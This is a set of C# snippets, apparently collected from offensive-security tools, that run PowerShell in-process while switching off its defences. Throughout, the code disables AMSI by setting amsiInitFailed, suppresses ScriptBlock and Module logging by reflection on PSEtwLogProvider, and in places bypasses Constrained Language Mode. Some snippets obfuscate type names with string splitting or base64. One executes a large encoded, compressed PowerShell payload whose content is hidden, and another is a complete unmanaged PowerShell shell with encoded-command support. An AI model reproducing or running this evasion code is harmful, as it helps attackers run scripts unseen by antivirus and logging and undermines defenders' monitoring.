public static string UnPosh(string[] command) { //https://github.com/leechristensen/Random/blob/master/CSharp/DisablePSLogging.cs //https://twitter.com/mattifestation/status/735261176745988096?lang=en PowerShell pInst = PowerShell.Create(); var pELP = pInst.GetType().Assembly.GetType("Sys" + "tem." + "Mana" + "geme" + "nt.Aut" + "oma" + "tio" + "n.Tr" + "aci" + "ng.P" + "SE" + "twL" + "og" + "Pr" + "ovi" + "d" + "er"); if (pELP != null) { var eP = pELP.GetField("e" + "tw" + "Pr" + "ov" + "id" + "er", BindingFlags.NonPublic | BindingFlags.Static); var eTP = new System.Diagnostics.Eventing.EventProvider(Guid.NewGuid()); eP.SetValue(null, eTP); } bool bA = true; var aU = pInst.GetType().Assembly.GetType("S" + "ys" + "te" + "m.M" + "an" + "ag" + "em" + "ent" + ".A" + "ut" + "om" + "at" + "i" + "o" + "n.A" + "ms" + "i" + "U" + "ti" + "l" + "s"); if (aU != null && bA == true) { aU.GetField("a" + "m" + "s" + "iI" + "n" + "i" + "tF" + "ai" + "l" + "ed", BindingFlags.NonPublic | BindingFlags.Static).SetValue(null, true); } string readCommand = ""; for (int i = 1; i < command.Length; i++) { readCommand = readCommand + " " + command[i]; } pInst.Commands.AddScript(readCommand); pInst.Commands.AddCommand("Ou" + "t-" + "S" + "tr" + "ing"); StringBuilder stringBuilder = new StringBuilder(); try { Collection <PSObject> results = pInst.Invoke(); foreach (PSObject obj in results) { stringBuilder.Append(obj); } } catch { stringBuilder.Append(string.Format("Error {0}", pInst.InvocationStateInfo.Reason)); } return(stringBuilder.ToString().Trim()); }
public static void Main(string[] args) { string Command = @"[System.Reflection.Assembly]::LoadWithPartialName('System.Windows.Forms'); [System.Windows.Forms.MessageBox]::Show('Hello from PowerShell!');"; using (PowerShell PowerShellInstance = PowerShell.Create()) { var PSEtwLogProvider = PowerShellInstance.GetType().Assembly.GetType("System.Management.Automation.Tracing.PSEtwLogProvider"); if (PSEtwLogProvider != null) { var EtwProvider = PSEtwLogProvider.GetField("etwProvider", BindingFlags.NonPublic | BindingFlags.Static); var EventProvider = new System.Diagnostics.Eventing.EventProvider(Guid.NewGuid()); EtwProvider.SetValue(null, EventProvider); } PowerShellInstance.AddScript(Command); PowerShellInstance.Invoke(); } }
// Following a discussion with cobbr over the implementation this was a much more elegant solution :) // Almost directly ripped from https://github.com/cobbr/SharpSploit/blob/master/SharpSploit/Execution/Shell.cs#L37-L55 // Credits to Ryan Cobb /// <summary> /// Executes specified PowerShell code using System.Management.Automation.dll and bypasses /// AMSI, ScriptBlock Logging, and Module Logging (but not Transcription Logging). /// </summary> /// <param name="PowerShellCode">PowerShell code to execute.</param> /// <param name="OutString">Switch. If true, appends Out-String to the PowerShellCode to execute.</param> /// <param name="BypassLogging">Switch. If true, bypasses ScriptBlock and Module logging.</param> /// <param name="BypassAmsi">Switch. If true, bypasses AMSI.</param> /// <returns>Output of executed PowerShell.</returns> /// <remarks> /// Credit for the AMSI bypass goes to Matt Graeber (@mattifestation). Credit for the ScriptBlock/Module /// logging bypass goes to Lee Christensen (@_tifkin). /// </remarks> public void RunPowerShell(string encpath, string encpass, string outfile, string scriptname, string arguments, bool BypassLogging = true, bool BypassAmsi = true) { Archiver archiver = new Archiver(); byte[] unpacked = archiver.ArchiveHelper(encpath, encpass, scriptname); string PowerShellCode = System.Text.Encoding.UTF8.GetString(unpacked); PowerShellCode += "\n" + arguments; System.Windows.Forms.MessageBox.Show(PowerShellCode); if (PowerShellCode == null || PowerShellCode == "") { return; } using (PowerShell ps = PowerShell.Create()) { BindingFlags flags = BindingFlags.NonPublic | BindingFlags.Static; if (BypassLogging) { var PSEtwLogProvider = ps.GetType().Assembly.GetType("System.Management.Automation.Tracing.PSEtwLogProvider"); if (PSEtwLogProvider != null) { var EtwProvider = PSEtwLogProvider.GetField("etwProvider", flags); var EventProvider = new System.Diagnostics.Eventing.EventProvider(Guid.NewGuid()); EtwProvider.SetValue(null, EventProvider); } } if (BypassAmsi) { var amsiUtils = ps.GetType().Assembly.GetType("System.Management.Automation.AmsiUtils"); if (amsiUtils != null) { amsiUtils.GetField("amsiInitFailed", flags).SetValue(null, true); } } ps.AddScript(PowerShellCode); var results = ps.Invoke(); string output = String.Join(Environment.NewLine, results.Select(R => R.ToString()).ToArray()); ps.Commands.Clear(); System.IO.File.WriteAllText(outfile, output); } }
/// <summary> /// Executes specified PowerShell code using System.Management.Automation.dll and bypasses /// AMSI, ScriptBlock Logging, and Module Logging (but not Transcription Logging). /// </summary> /// <param name="PowerShellCode">PowerShell code to execute.</param> /// <param name="OutString">Switch. If true, appends Out-String to the PowerShellCode to execute.</param> /// <param name="BypassLogging">Switch. If true, bypasses ScriptBlock and Module logging.</param> /// <param name="BypassAmsi">Switch. If true, bypasses AMSI.</param> /// <returns>Output of executed PowerShell.</returns> /// <remarks> /// Credit for the AMSI bypass goes to Matt Graeber (@mattifestation). Credit for the ScriptBlock/Module /// logging bypass goes to Lee Christensen (@_tifkin). /// </remarks> public static string PowerShellExecute(string PowerShellCode, bool OutString = true, bool BypassLogging = true, bool BypassAmsi = true) { if (PowerShellCode == null || PowerShellCode == "") { return(""); } using (PowerShell ps = PowerShell.Create()) { BindingFlags flags = BindingFlags.NonPublic | BindingFlags.Static; if (BypassLogging) { var PSEtwLogProvider = ps.GetType().Assembly.GetType("System.Management.Automation.Tracing.PSEtwLogProvider"); if (PSEtwLogProvider != null) { var EtwProvider = PSEtwLogProvider.GetField("etwProvider", flags); var EventProvider = new System.Diagnostics.Eventing.EventProvider(Guid.NewGuid()); EtwProvider.SetValue(null, EventProvider); } } if (BypassAmsi) { var amsiUtils = ps.GetType().Assembly.GetType("System.Management.Automation.AmsiUtils"); if (amsiUtils != null) { amsiUtils.GetField("amsiInitFailed", flags).SetValue(null, true); } } ps.AddScript(PowerShellCode); if (OutString) { ps.AddCommand("Out-String"); } var results = ps.Invoke(); string output = String.Join(Environment.NewLine, results.Select(R => R.ToString()).ToArray()); ps.Commands.Clear(); return(output); } }
public static string InvokePS(string command) { // I had to implement a custom PSHost in order to get Write-Host to work. // This wouldn't be an issue if all PowerShell scripts used Write-Output // instead of Write-Host, but enough use Write-Host that it's worth it // to implement a custom PSHost CustomPSHost host = new CustomPSHost(); var state = InitialSessionState.CreateDefault(); state.AuthorizationManager = null; // Bypass PowerShell execution policy using (Runspace runspace = RunspaceFactory.CreateRunspace(host, state)) { runspace.Open(); using (Pipeline pipeline = runspace.CreatePipeline()) { BindingFlags flags = BindingFlags.NonPublic | BindingFlags.Static; var PSEtwLogProvider = pipeline.Commands.GetType().Assembly.GetType("System.Management.Automation.Tracing.PSEtwLogProvider"); var EtwProvider = PSEtwLogProvider.GetField("etwProvider", flags); var EventProvider = new System.Diagnostics.Eventing.EventProvider(Guid.NewGuid()); EtwProvider.SetValue(null, EventProvider); var amsiUtils = pipeline.Commands.GetType().Assembly.GetType("System.Management.Automation.AmsiUtils"); amsiUtils.GetField("amsiInitFailed", flags).SetValue(null, true); pipeline.Commands.AddScript(command); pipeline.Commands[0].MergeMyResults(PipelineResultTypes.Error, PipelineResultTypes.Output); pipeline.Commands.Add("out-default"); pipeline.Invoke(); } } string output = ((CustomPSHostUserInterface)host.UI).Output; return(output); }
public static void InvokePS(string Command, bool BypassAmsi) { try { using (PowerShell PowerShellInstance = PowerShell.Create()) { // Disable ScriptBlockLogging // // In PowerShell: // $EtwProvider = [Ref].Assembly.GetType('System.Management.Automation.Tracing.PSEtwLogProvider').GetField('etwProvider','NonPublic,Static'); // $EventProvider = New-Object System.Diagnostics.Eventing.EventProvider -ArgumentList @([Guid]::NewGuid()); // $EtwProvider.SetValue($null, $EventProvider); var PSEtwLogProvider = PowerShellInstance.GetType().Assembly.GetType("System.Management.Automation.Tracing.PSEtwLogProvider"); if (PSEtwLogProvider != null) { var EtwProvider = PSEtwLogProvider.GetField("etwProvider", BindingFlags.NonPublic | BindingFlags.Static); var EventProvider = new System.Diagnostics.Eventing.EventProvider(Guid.NewGuid()); EtwProvider.SetValue(null, EventProvider); } // Disable AMSI // In PowerShell: [Ref].Assembly.GetType('http://System.Management .Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true) var AmsiUtils = PowerShellInstance.GetType().Assembly.GetType("System.Management.Automation.AmsiUtils"); if (AmsiUtils != null && BypassAmsi == true) { AmsiUtils.GetField("amsiInitFailed", BindingFlags.NonPublic | BindingFlags.Static).SetValue(null, true); } PowerShellInstance.AddScript(Command); PowerShellInstance.Invoke(); } } catch (Exception e) { Console.WriteLine("ERRROR: " + e.Message); } }
static void Main(string[] args) { try { string Command = @"Start-Sleep 1"; using (PowerShell powerShellInstance = PowerShell.Create()) { var psEtwLogProvider = powerShellInstance.GetType().Assembly.GetType("System.Management.Automation.Tracing.PSEtwLogProvider"); if (psEtwLogProvider != null) { var etwProvider = psEtwLogProvider.GetField("etwProvider", BindingFlags.NonPublic | BindingFlags.Static); var eventProvider = new System.Diagnostics.Eventing.EventProvider(Guid.NewGuid()); etwProvider.SetValue(null, eventProvider); } var fi = typeof(SystemPolicy).GetField("systemLockdownPolicy", BindingFlags.NonPublic | BindingFlags.Static); fi.SetValue(null, SystemEnforcementMode.None); powerShellInstance.AddScript(Command); powerShellInstance.Invoke(); } AllocConsole(); SetConsoleTitle("Windows PowerShell"); SetIcon(); var ps = new UnmanagedPSEntry(); ps.Start(null, args); Environment.Exit(0); } catch (Exception ex) { MessageBox.Show(ex.Message); } }
static void Main(string[] args) { string Payload = System.Text.Encoding.Unicode.GetString(System.Convert.FromBase64String("cwBhAGwAIABhACAATgBlAHcALQBPAGIAagBlAGMAdAA7AGkAZQB4ACgAYQAgAEkATwAuAFMAdAByAGUAYQBtAFIAZQBhAGQAZQByACgAKABhACAASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4ARABlAGYAbABhAHQAZQBTAHQAcgBlAGEAbQAoAFsASQBPAC4ATQBlAG0AbwByAHkAUwB0AHIAZQBhAG0AXQBbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACcAbgBWAFoAdABjADkAbwA0AEUAUAA3AHUAWAA2AEgAeAArAEEATwBlAFkAaABuAFMAaABPAFoAZwArAEoAQQA0ADUASgBLADcARQBqAGcAZwB5AGIAVQAwAGMAeQBQAHMAQgBSAFMATQA1AFUAaAB5AEMATQAzAHgAMwAyADkAbAA4ADUAYQAwAFQAVAB1AFgAeQBRAGQAcgB0AGIAdgBQADcAcgBNAHYAWQB0AGgAZgBLAGcAMQB6AGUAZwBXAGEAOQBrAEUAKwA4AGgAQwA2AGcAaQBlADYAegBSAEkAMgBBAFgAbABYAHIAeABzAHAAeQBBAEMAawA1AG0ATQBlAE0AZwAwADMATABPAFkAUgAwADEAdwBrAEEAWQB2AGoARQBRAHQAbgBwAEUAbQBlAEgAUwAwAHoAVwBGAG0ATwBDAHAAdgAyAFYATwB0AFUAMQBYADIALwArAHQAcwBCAHIAZABhAE8AYQBiAFYAQwBxADkAWAAzADkAYwBQAEQAOQB6AFkAcQB2AEgAWAB2ADgAegBuAEMASwBsADkAcABCAEEAagA5AFUAQwBRAGEARQB1ADMAYgAxAGoAaABMAFEAZwBOAEoAZwBwAE0AMgBLAFQAawB6AFcASgBhAGQAeQB4AHYAMwAyAFgASQBZAG8AbAAvAEIAdwB1AHUATQA3AGkASABVAHgAQgBzAHMAVQA3AGgAaQBjAHkARAAyAE8AcgBVACsAaABKAG4AawBlAGsAawBEAHUAVQB5ADEAbQBFAGkAVwBUAHAAZQAwAHgAKwArAFQAaQBFAEYAYwBKAEIAcABoAFkASQB5ADIAUgBRAFQAbwBiAGYAaQBtAFkAYwBEAFQASwBVAGkAagBpAHUAUQBFAHAANABFAHgANwBMAEkAbwA0AHMAbgBrAHAANwBaAHIAdgBiAFgAeABaADUAQgBDAEcAZgBQAFQAVwBJAFMAegBQAHYAOQBxAHcASwBzAEgAeAAwAGIAMABKAHkAegBYAGcAbwBPAGoAbQBzAFgASABtAEQATwBtAFMANgB6AG4AegBUAGUAZABnAEQAYQBwAGwAbAB5AGEAWgArAHYAQgBBADIAYQBzAEoAYgBxADMAagBSADcANgB1AEwAegBaAEMAeQBnAFEAQwBaAFoAUgBJACsAeQA1AEYAUABOAFQAcABxAEIAMgBXAEsAagBuAG4AbABjAFcAeABBAHIAMgA3AEYAQwA0AHMAbABZAEYARwByAEsAOQBnADgAYgBEAEwAMgBCAGoALwBMADgASQBiAHAAegB2AG8AeABlAFcAUgBtAHoAdwBIAGIAYgBhADEAYgA1ADEARgBXAHgAcQBuAHkAVwBtADkAcQBNADkAagBBAEUAOABhAGQAcABLAFEAbQBFAFkAUgBxAFQAcgB3AGYAawB4AC8AUgAzADAANgBWAEsARABLAGgAbQBEAG8AbABkAE0AQQB4AGsAZgBsAG0AUABZAFIAYwBCAEEAQQBuAFkAMQBXAHUAYQBWAGsAaQBYAFUARwA1AHMAYgBvAEEAUABKAEUAagBVAFcAYwBuADcATwBFAHgAYgBuAFYAUwBvADUAbwB6AEsAcABsAEkAawB6AG8AaAA4AGgAbQBlAGkAcABhAHcAMQBIAGkARABDADgAdQB5AE4ATwBXAGoAaABFAC8AdAA0AFIAWgAyAHgAOQBtAC8AMQBBAHYATQB3ADkAZABhADIAOQA5AE0ANQBhADIALwBRAGcAQwBWAC8AbgA5AHgAYQBIAFIAdAAxAHkAaQByAHEATgBoAGgAVgBLAHEAMABkADMATAA3AE0AMQA5AGIAUwBjAGEARAAvAGoATQA5AGoATABPAEQATQAzADAAUQA4AHoAcgB0AGIAMgBVAGkAWQBlAG4AbAAzAHIAWgA4AFIAdgBnAHMAdgBjAHYAUgB4AFIANwB0ADMAQwBLAEkAdwA1AHoAagBWAG0ARwB3AGcAeAA0ACsAQwBTADUAeQBLADQAawByAGsALwB3ACsAQwBJAGQANAA1AFIATQBFADMAcwBLAFAATABiAGIAWAArAEoAZgA3AGIAYgBLAEwAUwBHAHUASAA1AEEAOAA3AGsAWgBvAGkANgBUAEMAbABwAFAATABOAFEAbABKAHkAcgB2AGEANQBlAGQASgBJAHQAagBZAHoAUAA3AHMAWQAxADkAVQBQAEUAcgBOAGYAKwBnAFUAagAyADIAdgAyADkAZABOAEQAMwB4AFkAbwAwAEUAWQBhAEQAdwB4AFAAVwBLAEkARwBNAEsAWgBHAEsANgB2ADAAbABzADMAQgA0AHAAVQAyAG8AaABaAEwAUQA1AFMAdgBHADAAegBHAFMAOABQAGkANwBDAGwAMQB0AHEAYgArAHMAaQBHADAASABPAFIAbwBOAFkAbABqAE4AdABvAG4AbwBPAGkAVABTAHoASgBDAEkAbAA3AEIASwBGAGgAVgBmAEkAbgBtAGEAagBHAEcAagB3AHMAWABkAFQAbgBHAG0AYgAzAFEAdABKAHYASQBrAG0AQgA2ADYATABzAFMARQBPAHYAUQBBAFcANABUAFUAOQBpAGEASwBTAGYAUwBHAFUAeABsAFMAbQA2AHcAbgBqAFkALwBUAHIAUAB1AE8AUwBsAGoAegBWADkAYgAxAFYANwBKAGkATABIAHkAegBmAHgAbABZAC8AZgBHAFYAZwByADYAeAB2AEkASwArAFIARgArADkAawBnAHAAWgBJAGEARgB0ADgANQBYAEgATQAvAEMATgBhAEkAYQBWAGIAbgBrAFIAaQBvAGMAagBWAGcATgBUAG8AKwB3AGEANQA3AGQAegBXAEQAaAB0AGsASQBIAGwAawBjAEQANwBRAEMAaAA1AEUARgBrADQAYgBSAEQANwBXAHEAMQBWAGEAYwBVAG4ATQBaADQAQgBOAEUAOAA2AEUANwBYADYATAAxAFkATQB4AFMASgBBAEkAaABMAGMANQBhAHgAdgBlADgANAA1AGEAcABHACsAeAAzAGoAVwBxAE8ANAB0AHkALwBvAEsANQBXAEkAWABjADAAYgBhADgAZQBSAFcAMgA1AGMAMwA5AGQAdgB0ADkATQAxAHIARgBRAEEANgBFAGwAeQA5ADcASwBQAHAAOQBwADAAcQA4AEUAOQBXAE4ARwBVAC8ATQBnAE8AVAA5AEgAQQBKADYAZAAzAEIANQBoAGgASQBpAGgAUwA0AFMAagBFADAAVQBzAGEAawBpAHQAbgBuACsASABNADIAUgBEADgAbwB5AEwAZQBiADUATwAwAHUANwBmAFIAeABaAFEAeABKAG4ATQBkAG0ARwBWAGoAYQBCAEcASQArAEwAbABPADcAdQBqAGQAOAB0AFIAcwBOAGEAawBYAHkAMQBQAGgATgBEAEgAdABiAG0ARABNAFkAcwBpAC8AVQByAGYAWgBOADYAZwB4AFQAVgB6AEgAawB4AHcAawBXAEsAbwBvADIANQA5AFEAdgAyAE8ALwBQAFgAOABhAEIAOABUADIASwBpAHkAawBrAE8ATgA5AE4AUABYAHAAZAAyAHUARgBlAHIAQwAyAHkANQBIAGoAeABrAG8ASABTAGgAWQBoADcAZQAzAEwASwBNAHoAdwA0AG8ATQB3AHEAWABaADgAMwAxAEwAcwBFAFgASwBNADgARABRADkAKwB0AG4AVgBUAGkANQBFAHUAeQBmAHMASQBnAGUAYQB6AHYANgBtAHMAZQBMADYAYwBRAGgAbQBLAGUAWgByAHEANABjAEIAMABiAEoAeQBWAHIAMgB0AGkAdQBKADkAZQBEAGkAMAA3AHYAYwB2AEQAcABTAC8AOQBUAGYAOQBCAHEAMgB5AHYARABpAHIAbAA5ADQAUQB0AHgAUgBkAFAAZQBpAGkASQBzAEgAMAArACsATwBGAG4ARAAvAEwALwAyAFgAMABpADYAdgBVADcAUQA2AHYAYwA3AHYAWAA5AE8AZQBzAEgARgA1AGEAQQBWAEQASwA1ADcAcgBZAGEAVAA4AHEAagB4AC8AWgA5AEoAWgByAG0AawBUAGQAegA0AHgARABOADcALwBjAE4AdABTADMAVAA2AGYALwB5AHQALwBPAG4AbABnAHgALwBIAGYAdgBqAFEAZgBjAHkAcQBuAFMATgB4AEMAdQA4AHEAbQBWAHAAOABmAHAAVABMAHcAKwBWAGYAagArAGUAZgBtAHMAVABMAEUAdQBJAEkAcwA1ADEAeQBPAHQAYgA3AGQAcgBlAFAAdgBZAEoAQwA3AE8ASABVAHAAVABpAHIAUwBTAHgAWQBwAE4AWgA3AFgATABsAFcAQgBQADgATAAxAFEAUwA3AHgAagBTAGIAYwA0AHQAZQBmAEcAdwBHADEAMwB5AGIASABWAFoAOAAvAFUAcwA0AFAARwAyADYAegA4AEsAVgBKAEwAVwBuAFkAbwBDAFUAVgBJADgAcgBGAFcAdgB0AEkAOQBjAGkAcQAvADgAQQAnACkALABbAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgBNAG8AZABlAF0AOgA6AEQAZQBjAG8AbQBwAHIAZQBzAHMAKQApACwAWwBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQApACkALgBSAGUAYQBkAFQAbwBFAG4AZAAoACkA")); using (PowerShell powerShellInstance = PowerShell.Create()) { var psEtwLogProvider = powerShellInstance.GetType().Assembly.GetType("System.Management.Automation.Tracing.PSEtwLogProvider"); if (psEtwLogProvider != null) { var etwProvider = psEtwLogProvider.GetField("etwProvider", BindingFlags.NonPublic | BindingFlags.Static); var eventProvider = new System.Diagnostics.Eventing.EventProvider(Guid.NewGuid()); etwProvider.SetValue(null, eventProvider); } var amsi = powerShellInstance.GetType().Assembly.GetType("System.Management.Automation.AmsiUtils"); var amsifield = amsi.GetField("amsiInitFailed", BindingFlags.NonPublic | BindingFlags.Static); amsifield.SetValue(null, true); var fi = typeof(SystemPolicy).GetField("systemLockdownPolicy", BindingFlags.NonPublic | BindingFlags.Static); fi.SetValue(null, SystemEnforcementMode.None); powerShellInstance.AddScript(Payload).Invoke(); } }
/// <summary> /// Executes specified PowerShell code using System.Management.Automation.dll and bypasses /// AMSI, ScriptBlock Logging, and Module Logging (but not Transcription Logging). /// </summary> /// <param name="PowerShellCode">PowerShell code to execute.</param> /// <param name="OutString">Switch. If true, appends Out-String to the PowerShellCode to execute.</param> /// <param name="BypassLogging">Switch. If true, bypasses ScriptBlock and Module logging.</param> /// <param name="BypassAmsi">Switch. If true, bypasses AMSI.</param> /// <returns>Output of executed PowerShell.</returns> /// <remarks> /// Credit for the AMSI bypass goes to Matt Graeber (@mattifestation). Credit for the ScriptBlock/Module /// logging bypass goes to Lee Christensen (@_tifkin). /// </remarks> public static string PowerShellExecute(string PowerShellCode, bool OutString = true, bool BypassLogging = true, bool BypassAmsi = true) { if (string.IsNullOrEmpty(PowerShellCode)) { return(""); } using (PowerShell ps = PowerShell.Create()) { BindingFlags flags = BindingFlags.NonPublic | BindingFlags.Static; if (BypassLogging) { var PSEtwLogProvider = ps.GetType().Assembly.GetType("System.Management.Automation.Tracing.PSEtwLogProvider"); if (PSEtwLogProvider != null) { var EtwProvider = PSEtwLogProvider.GetField("etwProvider", flags); var EventProvider = new System.Diagnostics.Eventing.EventProvider(Guid.NewGuid()); EtwProvider.SetValue(null, EventProvider); } } if (BypassAmsi) { var amsiUtils = ps.GetType().Assembly.GetType("System.Management.Automation.AmsiUtils"); if (amsiUtils != null) { amsiUtils.GetField("amsiInitFailed", flags).SetValue(null, true); } } ps.AddScript(PowerShellCode); if (OutString) { ps.AddCommand("Out-String"); } PSDataCollection <object> results = new PSDataCollection <object>(); ps.Streams.Error.DataAdded += (sender, e) => { Console.WriteLine("Error"); foreach (ErrorRecord er in ps.Streams.Error.ReadAll()) { results.Add(er); } }; ps.Streams.Verbose.DataAdded += (sender, e) => { foreach (VerboseRecord vr in ps.Streams.Verbose.ReadAll()) { results.Add(vr); } }; ps.Streams.Debug.DataAdded += (sender, e) => { foreach (DebugRecord dr in ps.Streams.Debug.ReadAll()) { results.Add(dr); } }; ps.Streams.Warning.DataAdded += (sender, e) => { foreach (WarningRecord wr in ps.Streams.Warning) { results.Add(wr); } }; ps.Invoke(null, results); string output = string.Join(Environment.NewLine, results.Select(R => R.ToString()).ToArray()); ps.Commands.Clear(); return(output); } }
private void InitProvider(string providerId) { Guid providerGuid = new Guid(providerId); this.m_provider = new System.Diagnostics.Eventing.EventProvider(providerGuid); }
private void InitProvider(string providerId) { Guid providerGuid = new Guid(providerId); this.m_provider = new System.Diagnostics.Eventing.EventProvider(providerGuid); }
static void Main(string[] args) { PowerShell ps = PowerShell.Create(); // Disable Logging var PSEtwLogProvider = ps.GetType().Assembly.GetType("System.Management.Automation.Tracing.PSEtwLogProvider"); if (PSEtwLogProvider != null) { var EtwProvider = PSEtwLogProvider.GetField("etwProvider", BindingFlags.NonPublic | BindingFlags.Static); var EventProvider = new System.Diagnostics.Eventing.EventProvider(Guid.NewGuid()); EtwProvider.SetValue(null, EventProvider); } // Disable AMSI var AmsiUtils = ps.GetType().Assembly.GetType("System.Management.Automation.AmsiUtils"); if (AmsiUtils != null) { AmsiUtils.GetField("amsiInitFailed", BindingFlags.NonPublic | BindingFlags.Static).SetValue(null, true); } if (args.Length >= 1) { if (args[0].ToLower() == "-encode") { if (args.Length == 2) { Byte[] bytes = System.Text.Encoding.Unicode.GetBytes(args[1]); Console.WriteLine(System.Convert.ToBase64String(bytes)); } else { Console.WriteLine("usage: npl.exe -encode \"& commands; separated; by; semicolons;\""); } } else if (args[0].ToLower() == "-decode") { if (args.Length == 2) { String cmd = System.Text.Encoding.Unicode.GetString(System.Convert.FromBase64String(args[1])); Console.WriteLine(cmd); } else { Console.WriteLine("usage: npl.exe -decode {base_64_string}"); } } else if (args[0].ToLower() == "-shell") { List <string> history = new List <string>(); while (true) { ps.AddScript("pwd"); string pwd = ps.Invoke()[0].ToString(); string prompt = "PS " + pwd + "> "; string input = TabableReadLine(ps, prompt, pwd, history); if (string.IsNullOrEmpty(input)) { continue; } if (input.ToLower() == "exit") { break; } history.Add(input); Invoke(ps, input); ps.Commands.Clear(); } } else { if (args[0].ToLower() == "-encodedcommand" || args[0].ToLower() == "-enc") { String script = ""; for (int argidx = 1; argidx < args.Length; argidx++) { script += System.Text.Encoding.Unicode.GetString(System.Convert.FromBase64String(args[argidx])); } Invoke(ps, script); } else { String script = ""; for (int argidx = 0; argidx < args.Length; argidx++) { script += @args[argidx]; } Invoke(ps, script); } } } else { Console.WriteLine("\r\nusage:\r\nnpl.exe -shell\r\nnpl.exe \"{powershell single command}\"\r\nnpl.exe \"& {commands; semi-colon; separated}\"\r\nnpl.exe -encodedcommand {base64_encoded_command}\r\nnpl.exe -encode \"commands to encode to base64\"\r\nnpl.exe -decode {base64_encoded_command}"); } }
static void Main(string[] args) { PowerShell ps = PowerShell.Create(); // Disable Logging String myType = System.Text.Encoding.Unicode.GetString(System.Convert.FromBase64String("UwB5AHMAdABlAG0ALgBNAGEAbgBhAGcAZQBtAGUAbgB0AC4AQQB1AHQAbwBtAGEAdABpAG8AbgAuAFQAcgBhAGMAaQBuAGcALgBQAFMARQB0AHcATABvAGcAUAByAG8AdgBpAGQAZQByAA==")); String myField = System.Text.Encoding.Unicode.GetString(System.Convert.FromBase64String("ZQB0AHcAUAByAG8AdgBpAGQAZQByAA==")); var x = ps.GetType().Assembly.GetType(myType); if (x != null) { var y = x.GetField(myField, BindingFlags.NonPublic | BindingFlags.Static); var z = new System.Diagnostics.Eventing.EventProvider(Guid.NewGuid()); y.SetValue(null, z); } // Disable AMSI myType = System.Text.Encoding.Unicode.GetString(System.Convert.FromBase64String("UwB5AHMAdABlAG0ALgBNAGEAbgBhAGcAZQBtAGUAbgB0AC4AQQB1AHQAbwBtAGEAdABpAG8AbgAuAEEAbQBzAGkAVQB0AGkAbABzAA==")); myField = System.Text.Encoding.Unicode.GetString(System.Convert.FromBase64String("YQBtAHMAaQBJAG4AaQB0AEYAYQBpAGwAZQBkAA==")); x = ps.GetType().Assembly.GetType(myType); if (x != null) { x.GetField(myField, BindingFlags.NonPublic | BindingFlags.Static).SetValue(null, true); } if (args.Length >= 1) { if (args[0].ToLower() == "-encode") { if (args.Length == 2) { Byte[] bytes = System.Text.Encoding.Unicode.GetBytes(args[1]); Console.WriteLine(System.Convert.ToBase64String(bytes)); } else { Console.WriteLine("usage: npl.exe -encode \"& commands; separated; by; semicolons;\""); } } else if (args[0].ToLower() == "-decode") { if (args.Length == 2) { String cmd = System.Text.Encoding.Unicode.GetString(System.Convert.FromBase64String(args[1])); Console.WriteLine(cmd); } else { Console.WriteLine("usage: npl.exe -decode {base_64_string}"); } } else if (args[0].ToLower() == "-shell") { List <string> history = new List <string>(); while (true) { ps.AddScript("pwd"); string pwd = ps.Invoke()[0].ToString(); string prompt = "PS " + pwd + "> "; string input = TabableReadLine(ps, prompt, pwd, history); if (string.IsNullOrEmpty(input)) { continue; } if (input.ToLower() == "exit") { break; } history.Add(input); Invoke(ps, input); ps.Commands.Clear(); } } else { if (args[0].ToLower() == "-encodedcommand" || args[0].ToLower() == "-enc") { String script = ""; for (int argidx = 1; argidx < args.Length; argidx++) { script += System.Text.Encoding.Unicode.GetString(System.Convert.FromBase64String(args[argidx])); } Invoke(ps, script); } else { String script = ""; for (int argidx = 0; argidx < args.Length; argidx++) { script += @args[argidx]; } Invoke(ps, script); } } } else { Console.WriteLine("\r\nusage:\r\nnpl.exe -shell\r\nnpl.exe \"{powershell single command}\"\r\nnpl.exe \"& {commands; semi-colon; separated}\"\r\nnpl.exe -encodedcommand {base64_encoded_command}\r\nnpl.exe -encode \"commands to encode to base64\"\r\nnpl.exe -decode {base64_encoded_command}"); } }